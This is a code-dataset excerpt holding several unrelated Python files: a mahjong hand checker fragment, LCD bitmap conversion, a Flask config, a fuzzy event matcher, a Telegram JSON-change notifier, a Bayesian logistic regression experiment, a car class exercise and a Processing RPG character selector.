[2,3,4,6,7,8,9,9,11,11,11] #TODO deal with gang situation removed cases\nprint(find_winning_hand(tiles))\n\ndef Get_Adjacents(target):\n #takes a single target, and return valid, sorted connections that exists in the tiles\n adjacents = []\n\n if target not in Tiles:\n return adjacents\n\n if target in Dragons:\n return adjacents\n\n if target in Ones:\n\n if target+1 in Tiles:\n adjacents.append(target+1)\n \n return adjacents\n\n if target in Nines:\n\n if target-1 in Tiles:\n adjacents.append(target-1)\n\n return adjacents\n\n if target+1 in Tiles:\n adjacents.append(target+1)\n\n if target-1 in Tiles:\n adjacents.append(target-1)\n\n return (sorted(adjacents))\n\n\ndef One_Nine_Check(tiles):\n tile_dict = Counter(tiles)\n #if tile_dict.keys[] contains 1 or 9 tiles\n\n# winning hand conditions should have the pattern:\n\n# * requirement: already kou ting\n\n# mo bao win - draw tile the same as treasure\n# OR\n# normal win:\n # 1. one pair\n # 2. three of a kind (or four)\n # 3. one series\n # 4. everything else is either pattern 2 or 4\n # 5. 
all tiles should contain at least a 1 or 9\n\n\n# note that the possible winning hand only allows the number of tiles of 14 - 17 (maximum three \"Gangs\")\n\n# cases to pay attention to:\n    # a three of a kind might not be used as a three of a kind, it might be a pair plus a tile that belongs to a series\n    # to avoid the case above check for series first, then pick pair, then the rest should all be three of a kind (or Gang)\n\n    # holding mo Bao in an incomplete winning hand is still a win\n    # 7 pairs allowed?\n\n\n","sub_path":"pkg/harbin/Winning.py","file_name":"Winning.py","file_ext":"py","file_size_in_byte":6200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"545706564","text":"'''\nCreated on 1 Dec 2012\n\n@author: tony\n'''\n\n\n# pseudo code:\n# if number < 2:\n#     \"add it to the first place of binary list\"\n# else:\n#     temp = number % 2\n#     \"add temp to the first place of the binary list\"\n#     call this function (number // 2, binary_list)\ndef itob(num,binary_list):\n    if num<2 :\n        binary_list.insert(0,num)\n    else:\n        tmp=num%2\n        binary_list.insert(0,tmp)\n        itob(num//2,binary_list)\n    return binary_list\n    \ndef complete_display_list(target_binary_list):\n    if len(target_binary_list)<8:\n        target_binary_list.insert(0,0)\n        complete_display_list(target_binary_list)\n    \n    return target_binary_list\n\ndef convert_data_to_display(data_list):\n    display_list=[]\n    \n    for i in range(len(data_list)):\n        binary_list_tmp=[]\n        tmp = itob(data_list[i],binary_list_tmp)\n        complete_display_list(tmp)\n        display_list.extend(tmp)\n    return display_list\n\ndef convert_display_list_to_lcd_list_temp(display_list):\n\n    lcd_temp=[[0 for col in range(32)] for row in range(32)]\n    lcd_list_temp=[[0 for col in range(32)] for row in range(32)]\n    \n    for col in range(32):\n        for row in range(32):\n            lcd_temp[col][row]=display_list[col*32+row]\n    \n    for col in range(32):\n        for row in range(32):\n            lcd_list_temp[row][col]=lcd_temp[col][row]\n    \n    return lcd_list_temp\n\n# returns a 4096 entry (64x64) list of 1s and 0s, doubling each 32x32 pixel into a 2x2 block\ndef convert_to_lcd_display_list(data_list):\n    lcd_list_temp = convert_display_list_to_lcd_list_temp(convert_data_to_display(data_list))\n    lcd_list=[0]*4096\n    \n    for row in range(32):\n        for col in range(32):\n            temp=lcd_list_temp[col][row]\n            lcd_list[(row*2)*64+col*2]=temp\n            lcd_list[(row*2+1)*64+col*2]=temp\n            lcd_list[(row*2+1)*64+col*2+1]=temp\n            lcd_list[(row*2)*64+col*2+1]=temp\n    \n    return lcd_list\n\n\n\ndef convert_LCD_package_inv(lcd_list):\n    lcd_package_list=[[0 for row in range(8)] for col in range(64)]\n\n    for row in range(8):\n        for col in range(64):\n            # convert 8 'bit' to 1 Byte int\n            int_temp=0\n            for bit in range(8):\n                int_temp+=lcd_list[(row*8+(7-bit))*64+col]*2**(7-bit)\n            lcd_package_list[row][col]=int_temp\n\n    return lcd_package_list\n    ","sub_path":"Test/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"482428084","text":"import os\nfrom datetime import timedelta\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'db.sqlite')\n#SQLALCHEMY_DATABASE_URI = 'mysql://vagrant:vagrant@localhost/fsa'\nSQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')\nSQLALCHEMY_COMMIT_ON_TEARDOWN = True\nREMEMBER_COOKIE_DURATION = timedelta(days=1)\n\nCSRF_ENABLED = True\nSECRET_KEY = 'very-secret-for-now'\n\n\nADMINS = 
['eddy@thehackerati.com']\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"87065505","text":"from fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nclass eventObj:\n def __init__(self):\n self.name = input('name: ')\n self.typee = input('type: ')\n self.theme = input('theme: ')\n \nclass vacebularry:\n def __init__(self):\n self.name=[]\n self.typee=[]\n self.theme=[]\n f = open('vac.dat')\n i=0\n for line in f:\n if i==0:\n if line==']\\n':\n i+=1\n else:\n self.name.append(line)\n elif i==1:\n if line==']\\n':\n i+=1\n else:\n self.typee.append(line)\n \n elif i==2:\n if line==']\\n':\n i+=1\n else:\n self.theme.append(line)\n f.close()\n def compairing(self, event):\n res=0\n j=0\n for i in range(len(self.name)):\n if fuzz.partial_ratio(self.name[i], event.name)>j:\n j=fuzz.partial_ratio(self.name[i], event.name)\n print(j)\n res+=j/100\n j=0\n for i in range(len(self.typee)):\n if fuzz.partial_ratio(self.typee[i], event.typee)>j:\n j=fuzz.partial_ratio(self.typee[i], event.typee)\n print(j)\n res+=j/100\n j=0\n for i in range(len(self.theme)):\n if fuzz.partial_ratio(self.theme[i], event.theme)>j:\n j=fuzz.partial_ratio(self.theme[i], event.theme)\n print(j)\n return (res+j/100)/3\n def close(self):\n f = open('vac.dat', 'w')\n for i in range(len(self.name)):\n f.write(self.name[i])\n for i in range(len(self.typee)):\n f.write(self.typee[i])\n for i in range(len(self.theme)):\n f.write(self.theme[i])\n\ntry:\n event = eventObj()\n vac = vacebularry()\n print(vac.compairing(event)*100, '%')\nexcept Exception as e:\n raise e\n vac.close()\n\n","sub_path":"hack.py","file_name":"hack.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"272542873","text":"# coding: utf-8\nimport argparse\nimport logging\nimport os\nimport json\nimport requests\nfrom telegram.ext import Updater\nfrom time import sleep\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n\nclass Check():\n def __init__(self, authToken, url, chatId):\n self.lastContent = \"\"\n self.filePath = os.path.dirname(os.path.realpath(__file__)) + \"\\cache\"\n self.authToken = authToken\n self.url = url\n self.chatId = chatId\n\n def cacheContainsId(self, id, cache):\n for j in cache['nodes']:\n if j['id'] == id:\n return True\n return False\n\n def run(self):\n while True:\n if not os.path.isfile(self.filePath) or os.path.getsize(self.filePath) == 0:\n with open(self.filePath, \"w\") as file:\n self.lastContent = json.loads(requests.get(self.url).text)\n json.dump(self.lastContent, file)\n else:\n with open(self.filePath, \"r\") as file:\n self.lastContent = json.load(file)\n\n r = requests.get(self.url)\n js = json.loads(r.text)\n\n if self.lastContent['nodes'] != js['nodes']:\n updater = Updater(self.authToken)\n for i in js['nodes']:\n isNew = self.cacheContainsId(i['id'], self.lastContent)\n if not isNew:\n updater.bot.sendMessage(chat_id=self.chatId,\n text=\"Neuer Knoten {}\".format(i['id'], i['name']), parse_mode=\"html\")\n\n self.lastContent = js\n\n with open(self.filePath, \"w\") as file:\n json.dump(self.lastContent, file)\n\n logging.info(\"Sleeping 60s\")\n sleep(60)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Überprüft eine JSON-Datei nach Änderungen\")\n 
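# the German strings translate to: description = \"checks a JSON file for changes\";\n    # -token: \"auth token for the Telegram bot\"; -url: \"network path to the JSON file\";\n    # -chat: \"Telegram chat id the notification should be sent to\"\n    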
parser.add_argument(\"-token\", type=str, required=True, help=\"Authtoken für den Telegram Bot\")\n parser.add_argument(\"-url\", type=str, required=True, help=\"Netzwerkpfad zur JSON-Datei\")\n parser.add_argument(\"-chat\", type=int, required=True,\n help=\"Telegram Chat-ID an die die Benachrichtigung gesendet werden soll\")\n parsed_args = parser.parse_args()\n\n if not parsed_args.token:\n parser.print_help()\n exit()\n\n Check(parsed_args.token, parsed_args.url, parsed_args.chat).run()\n","sub_path":"checkForUpdates.py","file_name":"checkForUpdates.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"326316089","text":"\"\"\"A simple hierarchical logistic regression experiment for distributed EP\nalgorithm described in an article \"Expectation propagation as a way of life\"\n(arXiv:1412.4869).\n\nGroup index j = 1 ... J\nModel m3:\n y_j ~ bernoulli_logit(alpha_j + beta_j * x_j)\n alpha_j ~ N(mu_a,sigma_a)\n beta_j ~ N(mu_b,sigma_b)\n Cov([beta_j]_a, [beta_j]_b) = 0, a != b\n mu_a ~ N(0,sigma_ma)\n mu_b ~ N(0,sigma_mb)\n sigma_a ~ log-N(0,sigma_sa)\n sigma_b ~ log-N(0,sigma_sb)\n Fixed sigma_ma, sigma_mb, sigma_sa, sigma_sb\n phi = [mu_a, log(sigma_a), mu_b, log(sigma_b)]\n\nExecute with:\n $ python fit_.py [mtype]\nwhere argument mtype can be either `full` or `distributed`. If type is omitted,\nboth models are fit. The results are saved into files res_f_.npz and\nres_d_.npz into the folder results respectively.\n\nAfter running this skript for both full and distributed, the script plot_res.py\ncan be used to plot the results.\n\nThe most recent version of the code can be found on GitHub:\nhttps://github.com/gelman/ep-stan\n\n\"\"\"\n\n# Licensed under the 3-clause BSD license.\n# http://opensource.org/licenses/BSD-3-Clause\n#\n# Copyright (C) 2014 Tuomas Sivula\n# All rights reserved.\n\nfrom __future__ import division\nimport os\nimport numpy as np\n\nfrom fit import fit_distributed, fit_full\n\n\n# ------------------------------------------------------------------------------\n# >>>>>>>>>>>>> Configurations start >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n# ------------------------------------------------------------------------------\n\n# ====== Seed ==================================================================\n# Use SEED = None for random seed\nSEED_DATA = 0 # Seed for simulating the data\nSEED_MCMC = 0 # Seed for the inference algorithms\n\n# ====== Data size =============================================================\nJ = 10 # Number of hierarchical groups\nD = 10 # Number of inputs\nK = 10 # Number of sites\nNPG = [40,60] # Number of observations per group (constant or [min, max])\n\n# ====== Set parameters ========================================================\n# If MU_A is None, it is sampled from N(0,SIGMA_MA)\nMU_A = 0.1\nSIGMA_MA = None\n# If SIGMA_A is None, it is sampled from log-N(0,SIGMA_SA)\nSIGMA_A = 1\nSIGMA_SA = None\nSIGMA_MB = 0\nSIGMA_SB = 1\n\n# ====== Prior =================================================================\n# Prior for mu_a\nM0_MA = 0\nV0_MA = 2**2\n# Prior for log(sigma_a)\nM0_SA = 0\nV0_SA = 2**2\n# Prior for mu_b\nM0_MB = 0\nV0_MB = 2**2\n# Prior for log(sigma_b)\nM0_SB = 0\nV0_SB = 2**2\n\n# ====== Sampling parameters ===================================================\nCHAINS = 4\nITER = 800\nWARMUP = 400\nTHIN = 2\n\n# ====== Number of EP iterations ===============================================\nEP_ITER = 6\n\n# ====== Tilted 
distribution precision estimate method =========================\n# Available options are 'sample' and 'olse', see class serial.Master.\nPREC_ESTIM = 'olse'\n\n# ====== 32bit Python ? ========================================================\n# Temp fix for the RandomState seed problem with pystan in 32bit Python. Set\n# the following to True if using 32bit Python.\nTMP_FIX_32BIT = True\n\n# ------------------------------------------------------------------------------\n# <<<<<<<<<<<<< Configurations end <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n# ------------------------------------------------------------------------------\n\n\ndef main(mtype='both'):\n \n # Check mtype\n if mtype != 'both' and mtype != 'full' and mtype != 'distributed':\n raise ValueError(\"Invalid argument `mtype`\")\n \n model_name = 'm3'\n \n # ------------------------------------------------------\n # Simulate data\n # ------------------------------------------------------\n \n # Set seed\n rnd_data = np.random.RandomState(seed=SEED_DATA)\n \n # Parameters\n # Number of observations for each group\n if hasattr(NPG, '__getitem__') and len(NPG) == 2:\n Nj = rnd_data.randint(NPG[0],NPG[1]+1, size=J)\n else:\n Nj = NPG*np.ones(J, dtype=np.int64)\n # Total number of observations\n N = np.sum(Nj)\n # Observation index limits for J groups\n j_lim = np.concatenate(([0], np.cumsum(Nj)))\n # Group indices for each sample\n j_ind = np.empty(N, dtype=np.int64)\n for j in xrange(J):\n j_ind[j_lim[j]:j_lim[j+1]] = j\n \n # Assign parameters\n if SIGMA_A is None:\n sigma_a = np.exp(rnd_data.randn()*SIGMA_SA)\n else:\n sigma_a = SIGMA_A\n if MU_A is None:\n mu_a = rnd_data.randn()*SIGMA_MA\n else:\n mu_a = MU_A\n sigma_b = np.exp(rnd_data.randn(D)*SIGMA_SB)\n mu_b = rnd_data.randn(D)*SIGMA_MB\n alpha_j = mu_a + rnd_data.randn(J)*sigma_a\n beta_j = mu_b + rnd_data.randn(J,D)*sigma_b\n dphi = 2*D+2 # Number of shared parameters\n phi_true = np.empty(dphi)\n phi_true[0] = mu_a\n phi_true[1] = np.log(sigma_a)\n phi_true[2:2+D] = mu_b\n phi_true[2+D:] = np.log(sigma_b)\n \n # Simulate data\n X = rnd_data.randn(N,D)\n y = np.empty(N)\n for n in xrange(N):\n y[n] = alpha_j[j_ind[n]] + X[n].dot(beta_j[j_ind[n]])\n y = 1/(1+np.exp(-y))\n y = (rnd_data.rand(N) < y).astype(int)\n \n # ------------------------------------------------------\n # Prior\n # ------------------------------------------------------\n \n # Moment parameters of the prior (transposed in order to get F-contiguous)\n S0 = np.empty(dphi)\n S0[0] = V0_MA\n S0[1] = V0_SA\n S0[2:2+D] = V0_MB\n S0[2+D:] = V0_SB\n S0 = np.diag(S0).T\n m0 = np.empty(dphi)\n m0[0] = M0_MA\n m0[1] = M0_SA\n m0[2:2+D] = M0_MB\n m0[2+D:] = M0_SB\n # Natural parameters of the prior\n Q0 = np.diag(1/np.diag(S0)).T\n r0 = m0/np.diag(S0)\n prior = {'Q':Q0, 'r':r0}\n \n # ------------------------------------------------------\n # Fit model(s)\n # ------------------------------------------------------\n \n if mtype == 'both' or mtype == 'distributed':\n \n # Options for the ep-algorithm see documentation of dep.serial.Master\n options = {\n 'seed' : SEED_MCMC,\n 'init_prev' : True,\n 'prec_estim' : PREC_ESTIM,\n 'chains' : CHAINS,\n 'iter' : ITER,\n 'warmup' : WARMUP,\n 'thin' : THIN,\n 'prior' : prior\n }\n # Temp fix for the RandomState seed problem with pystan in 32bit Python\n options['tmp_fix_32bit'] = TMP_FIX_32BIT\n \n fit_distributed(model_name, EP_ITER, J, K, Nj, X, y, phi_true, options)\n \n if mtype == 'both' or mtype == 'full':\n \n seed = np.random.RandomState(seed=SEED_MCMC)\n \n # Temp 
fix for the RandomState seed problem with pystan in 32bit Python\n seed = seed.randint(2**31-1) if TMP_FIX_32BIT else seed\n \n fit_full(model_name, J, j_ind, X, y, phi_true, m0, Q0, seed)\n \n\nif __name__ == '__main__':\n if len(os.sys.argv) == 2:\n main(os.sys.argv[1])\n else:\n main()\n\n\n\n","sub_path":"experiment/fit_m3.py","file_name":"fit_m3.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"386540537","text":"#!/usr/bin/env python\n\nfrom enum import Enum\nfrom random import randint\n\n\"\"\"\nРеализуйте базовый класс Car. У данного класса должны быть следующие атрибуты: speed, color, name, is_police (булево).\nА также методы: go, stop, turn(direction), которые должны сообщать, что машина поехала, остановилась, повернула (куда).\nОпишите несколько дочерних классов: TownCar, SportCar, WorkCar, PoliceCar. Добавьте в базовый класс метод show_speed,\nкоторый должен показывать текущую скорость автомобиля. Для классов TownCar и WorkCar переопределите метод show_speed.\nПри значении скорости свыше 60 (TownCar) и 40 (WorkCar) должно выводиться сообщение о превышении скорости.\n\nСоздайте экземпляры классов, передайте значения атрибутов. Выполните доступ к атрибутам, выведите результат.\nВыполните вызов методов и также покажите результат.\n\"\"\"\n\n\nclass Colors(Enum):\n RED = \"red\"\n GREEN = \"green\"\n BLUE = \"blue\"\n BLACK = \"black\"\n YELLOW = \"yellow\"\n WHITE = \"white\"\n\n\nclass Directions(Enum):\n LEFT = \"left\"\n RIGHT = \"right\"\n\n\nclass Car:\n _name = \"\"\n _color = \"\"\n _speed = 0\n _is_police = False\n\n def __init__(self, name, color, speed=0, is_police=False):\n self._name = name\n self._color = color\n self._speed = speed\n self._is_police = is_police\n\n def set_speed(self, speed):\n self._speed = speed\n\n def get_speed(self):\n return self._speed\n\n def show_speed(self):\n print(f\"{self._name}, current speed: {self._speed}\")\n\n def go(self):\n self.set_speed(randint(1, 280))\n print(f\"Car '{self._name}' started to move\")\n\n def stop(self):\n self.set_speed(0)\n print(f\"Car '{self._name}' stopped\")\n\n def turn(self, direction):\n print(f\"Car '{self._name}' turned '{direction.value}'\")\n\n\nclass TownCar(Car):\n def __init__(self, name, color=Colors.WHITE):\n super().__init__(name, color=color, is_police=False)\n\n def show_speed(self):\n print(f\"{self._name}, current speed: {self._speed}\")\n if self.get_speed() > 60:\n print(\"Car is moving too fast. I am calling the police!\")\n\n\nclass SportCar(Car):\n def __init__(self, name, color=Colors.RED):\n super().__init__(name, color=color, is_police=False)\n\n\nclass WorkCar(Car):\n def __init__(self, name, color=Colors.YELLOW):\n super().__init__(name, color=color, is_police=False)\n\n def show_speed(self):\n print(f\"{self._name}, current speed: {self._speed}\")\n if self.get_speed() > 40:\n print(\"Car is moving too fast. 
I am calling to your Boss!\")\n\n\nclass PoliceCar(Car):\n def __init__(self, name, color=Colors.BLUE):\n super().__init__(name, color=color, is_police=True)\n\n\ndef main():\n # Random car\n random_car = Car(\"Volvo\", Colors.BLACK)\n random_car.go()\n random_car.turn(Directions.LEFT)\n random_car.show_speed()\n random_car.stop()\n\n # Town car\n t_car = TownCar(\"Suzuki\")\n t_car.go()\n t_car.turn(Directions.RIGHT)\n t_car.show_speed()\n t_car.stop()\n\n # Sport car\n s_car = SportCar(\"Ferrari\")\n s_car.go()\n s_car.turn(Directions.LEFT)\n s_car.show_speed()\n s_car.stop()\n\n # Work car\n w_car = WorkCar(\"Reno\")\n w_car.go()\n w_car.turn(Directions.RIGHT)\n w_car.show_speed()\n w_car.stop()\n\n # Police car\n p_car = PoliceCar(\"Lada\", Colors.BLACK)\n p_car.go()\n p_car.turn(Directions.RIGHT)\n p_car.show_speed()\n p_car.stop()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"lesson-6/task04.py","file_name":"task04.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"421763002","text":"state = 0\nplayers = 0\nwar = False\nwiz = False\nrog = False\nran = False\npal = False\nmon = False\nwarl = False\nsai = False\ncharList = []\ncharInList = 0\ncurrChar = []\nbagi = 0\nbstr = 0\nbdex = 0\nbint = 0\npoints = 2\nfinalChars = []\nwarriorimg = 0\nwizardimg = 0\nrogueimg = 0\nrangerimg = 0\npaladinimg = 0\nmonkimg = 0\nwarlockimg = 0\nsaintimg = 0\n\n'''Loads the images of the characters'''\ndef loadCharImg():\n global warriorimg\n global wizardimg\n global rogueimg\n global rangerimg\n global paladinimg\n global monkimg\n global warlockimg\n global saintimg\n warriorimg = loadImage(\"Warrior.png\")\n wizardimg = loadImage(\"Wizard.png\")\n rogueimg = loadImage(\"Rogue.png\")\n rangerimg = loadImage(\"Ranger.png\")\n paladinimg = loadImage(\"Paladin.png\")\n monkimg = loadImage(\"Monk.png\")\n warlockimg = loadImage(\"Warlock.png\")\n saintimg = loadImage(\"Saint.png\")\n\n\n'''Prints all text that appears in this window for the character selecter'''\ndef printText():\n global warriorimg\n global wizardimg\n global rogueimg\n global rangerimg\n global paladinimg\n global monkimg\n global warlockimg\n global saintimg\n fill(0,0,0)\n textSize(32)\n text(\"Warrior\",100,330)\n image(warriorimg, 50, 50, 213, 250)\n text(\"Wizard\",353,330)\n image(wizardimg, 303, 50, 213, 250)\n text(\"Rogue\",606,330)\n image(rogueimg, 556, 50, 213, 250)\n text(\"Ranger\",859,330)\n image(rangerimg, 809, 50, 213, 250)\n text(\"Paladin\",100,650)\n image(paladinimg, 50, 370, 213, 250)\n text(\"Monk\",358,650)\n image(monkimg, 303, 370, 213, 250)\n text(\"Warlock\",606,650)\n image(warlockimg, 556, 370, 213, 250)\n text(\"Saint\",864,650)\n image(saintimg, 809, 370, 213, 250)\n text(\"Confirm\",1185,620)\n \n'''Sets the base stats for the current character in the stat changer'''\ndef setBases(x):\n global currChar\n global bagi\n global bstr\n global bdex\n global bint\n currChar = list(charList[x])\n bagi = charList[x][4]\n bstr = charList[x][2]\n bdex = charList[x][3]\n bint = charList[x][5]\n \n'''Sets up the title screen/main menu'''\ndef setup():\n background(139,0,0)\n size(1500, 800)\n fill(218,165,32)\n rect(350,350,800,150)\n rect(350,575,800,150)\n textSize(200)\n text(\"World's End\", 175, 200)\n fill(0)\n textSize(72)\n text(\"Start Game\", 550, 450)\n text(\"Exit Game\", 575, 675)\n\n\n'''Sets up the character selecter'''\ndef setup2():\n background(139,0,0)\n size(1500, 800)\n fill(255)\n 
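# eight 233x300 card slots in a 4x2 grid; printText() below draws the class\n    # portraits and labels on top of them\n    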
rect(40,40,233,300)\n rect(293,40,233,300)\n rect(546,40,233,300)\n rect(799,40,233,300)\n rect(40,360,233,300)\n rect(293,360,233,300)\n rect(546,360,233,300)\n rect(799,360,233,300)\n fill(150)\n rect(1150,560,200,100)\n loadCharImg()\n printText()\n \n'''Sets up the stat distributor'''\ndef setup3():\n global charInList\n size(1500, 800)\n fill(255)\n background(139,0,0)\n setBases(charInList)\n \n'''Sets up the letter screen'''\ndef setup50():\n size(1500,800)\n fill(218,165,32)\n rect(1150,560,200,100)\n fill(0)\n textSize(32)\n text(\"Continue\",1180,620)\n letter = loadImage(\"letter.png\")\n image(letter, 200,0,600,800)\n\ndef charHover():\n textSize(18)\n if 40 < mouseX < 270 and 40 < mouseY < 340 and war == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Warrior\", 1125, 90)\n textSize(24)\n text(\"HP:25\\nAgility:2\\nIntelligence:1\\nStrength:5\\nDexterity:2\", 1125, 125)\n textSize(12)\n text(\"The Sound of Fear - When used, any damage\\ndone to a different player gets directed\\nto the warrior. A temporary hp bonus\\nequal to half the Warrior's maximum health\\nfor the entire battle and pulls aggro regardless\\nof when they attacked for 1 turn\\n(this bonus stacks with your current health).\", 1125, 300)\n \n elif 293 < mouseX < 526 and 40 < mouseY < 340 and wiz == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Wizard\", 1125, 90)\n textSize(24)\n text(\"HP:10\\nAgility:3\\nIntelligence:5\\nStrength:2\\nDexterity:3\", 1125, 125)\n textSize(12)\n text(\"Arcane Expertise - The Wizard is capable of\\nlearning any spell, with its cooldown\\nbeing equal to its rarity (magic missile\\nno cooldown, uncommon 2 battles, rare 3\\nbattles, legendary 4 battles, The Wizard cannot\\nlearn resurrection magic.)\", 1125, 300)\n \n elif 546 < mouseX < 779 and 40 < mouseY < 340 and rog == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Rogue\", 1125, 90)\n textSize(24)\n text(\"HP:15\\nAgility:5\\nIntelligence:2\\nStrength:2\\nDexterity:3\", 1125, 125)\n textSize(12)\n text(\"Assassinate - When the Rogue is faster than\\nits opponent they deal a preemptive strike\\non the turn they join the combat instead\\nof doing their normal attack. The damage\\nis equal to the rogue's weapon damage,\\nplus AGI + DEX.\", 1125, 300)\n \n elif 799 < mouseX < 1032 and 40 < mouseY < 340 and ran == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Ranger\", 1125, 90)\n textSize(24)\n text(\"HP:15\\nAgility:4\\nIntelligence:2\\nStrength:1\\nDexterity:5\", 1125, 125)\n textSize(12)\n text(\"Snipe - If the Ranger is two spaces away from\\nan encounter the Ranger hasn't started,\\nthey can join combat from two spaces away.\\nIf the player that generated the encounter\\ndies, the encounter shifts from the dead\\nplayer to the ranger, and the encounter\\nwill start attacking after a 1 turn delay, (this\\nclass ability can only be used if the Ranger\\nposseses a DEX-Based Ranged weapon).\", 1125, 300)\n \n elif 40 < mouseX < 270 and 360 < mouseY < 660 and pal == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Paladin\", 1125, 90)\n textSize(24)\n text(\"HP:20\\nAgility:2\\nIntelligence:4\\nStrength:4\\nDexterity:1\", 1125, 125)\n textSize(12)\n text(\"Empower Weapon - At any point in combat the\\nPaladin can imbue their weapon with the\\nsacred magic they know from the start of the\\ngame to give their next attack a special effect,\\nspecified on the spell card. 
Also makes\\ndamage weapon power + intelligence for\\none attack. (Has a cooldown of 2 turns).\", 1125, 300)\n \n elif 293 < mouseX < 526 and 360 < mouseY < 660 and mon == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Monk\", 1125, 90)\n textSize(24)\n text(\"HP:15\\nAgility:4\\nIntelligence:2\\nStrength:2\\nDexterity:4\", 1125, 125)\n textSize(12)\n text(\"Taoism - At any point in combat the Monk can\\nmake two attacks in one turn, the standard\\ndealing 100% damage and the second strike\\nat half damage value of the first strike. This\\nability isn't usable when the Monk is using\\na two handed weapon. (Has a cooldown of\\n3 turns).\", 1125, 300)\n \n elif 546 < mouseX < 779 and 360 < mouseY < 660 and warl == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Warlock\", 1125, 90)\n textSize(24)\n text(\"HP:15\\nAgility:3\\nIntelligence:5\\nStrength:2\\nDexterity:2\", 1125, 125)\n textSize(10)\n text(\"Intertwine Fate - The Warlock can bind a creature\\nof Uncommon or lower ranking to the Warlock.\\nThe creature will be decided by drawing monsters\\nfrom the monster pile until a common or uncommon\\nmonster card is drawn. The creature and Warlock\\nare bound by life, when the creature dies\\nthe Warlock receives damage depending on\\nthe ranking of the monster (Common = 5 damage,\\nUncommon = 10 damage). The creature acts directly\\nafter the Warlock's turn. The warlock can summon\\nanother creature if their current creature\\nhas died, but with every summoned creature's\\ndeath, the damage penalty for a creature\\ndying will increase by 2.\", 1125, 300)\n \n elif 799 < mouseX < 1032 and 360 < mouseY < 660 and sai == False:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n textSize(42)\n text(\"Saint\", 1125, 90)\n textSize(24)\n text(\"HP:15\\nAgility:3\\nIntelligence:5\\nStrength:1\\nDexterity:3\", 1125, 125)\n textSize(12)\n text(\"Divine Blessing - When the Saint uses a\\nhealing type spell they can make the effects\\nparty wide for as long as the group is fighting\\nwithin the same encounter, or on the\\nsame space.\", 1125, 300)\n \n else:\n fill(255)\n rect(1100, 40, 300, 500)\n fill(0)\n \n'''Draws all non-changing text in the program in the stat distributor'''\ndef drawText():\n textSize(32)\n fill(0)\n text(\"-\",728,248)\n text(\"-\",728,298)\n text(\"-\",728,348)\n text(\"-\",728,398)\n text(\"+\",825,248)\n text(\"+\",825,298)\n text(\"+\",825,348)\n text(\"+\",825,398)\n textSize(72)\n text(\"Confirm\", 485, 575)\n\n'''Draws all changing text in the program, using character x. 
Stat distributor'''\ndef drawCharacter(x):\n global currChar\n global warriorimg\n global wizardimg\n global rogueimg\n global rangerimg\n global paladinimg\n global monkimg\n global warlockimg\n global saintimg\n background(139,0,0)\n fill(0)\n textSize(72)\n text(charList[x][0],50,100)\n textSize(32)\n text(\"HP: \" + str(currChar[1]),400,200)\n text(\"Agility: \" + str(currChar[4]), 400, 250)\n text(\"Intelligence: \" + str(currChar[5]), 400, 300)\n text(\"Strength: \" + str(currChar[2]), 400, 350)\n text(\"Dexterity: \" + str(currChar[3]), 400, 400)\n text(\"Stat points left to assign: \" + str(points), 400, 450)\n if currChar[0] == \"Warrior\":\n image(warriorimg, 50, 150, 300, 400)\n elif currChar[0] == \"Wizard\":\n image(wizardimg, 50, 150, 300, 400)\n elif currChar[0] == \"Rogue\":\n image(rogueimg, 50, 150, 300, 400)\n elif currChar[0] == \"Ranger\":\n image(rangerimg, 50, 150, 300, 400)\n elif currChar[0] == \"Paladin\":\n image(paladinimg, 50, 150, 300, 400)\n elif currChar[0] == \"Monk\":\n image(monkimg, 50, 150, 300, 400)\n elif currChar[0] == \"Warlock\":\n image(warlockimg, 50, 150, 300, 400)\n else:\n image(saintimg, 50, 150, 300, 400)\n \n'''Draws all buttons for the stat distributor'''\ndef drawButtons(x):\n if((currChar[4]) != (charList[x][4])):\n fill(255)\n rect(700, 222, 75, 32)\n else:\n fill(180)\n rect(700, 222, 75, 32)\n if((currChar[5]) != (charList[x][5])):\n fill(255)\n rect(700, 272, 75, 32)\n else:\n fill(180)\n rect(700, 272, 75, 32)\n if((currChar[2]) != (charList[x][2])):\n fill(255)\n rect(700, 322, 75, 32)\n else:\n fill(180)\n rect(700, 322, 75, 32)\n if((currChar[3]) != (charList[x][3])):\n fill(255)\n rect(700, 372, 75, 32)\n else:\n fill(180)\n rect(700, 372, 75, 32)\n \n if((currChar[4]) != 5 and points > 0):\n fill(255)\n rect(800, 222, 75, 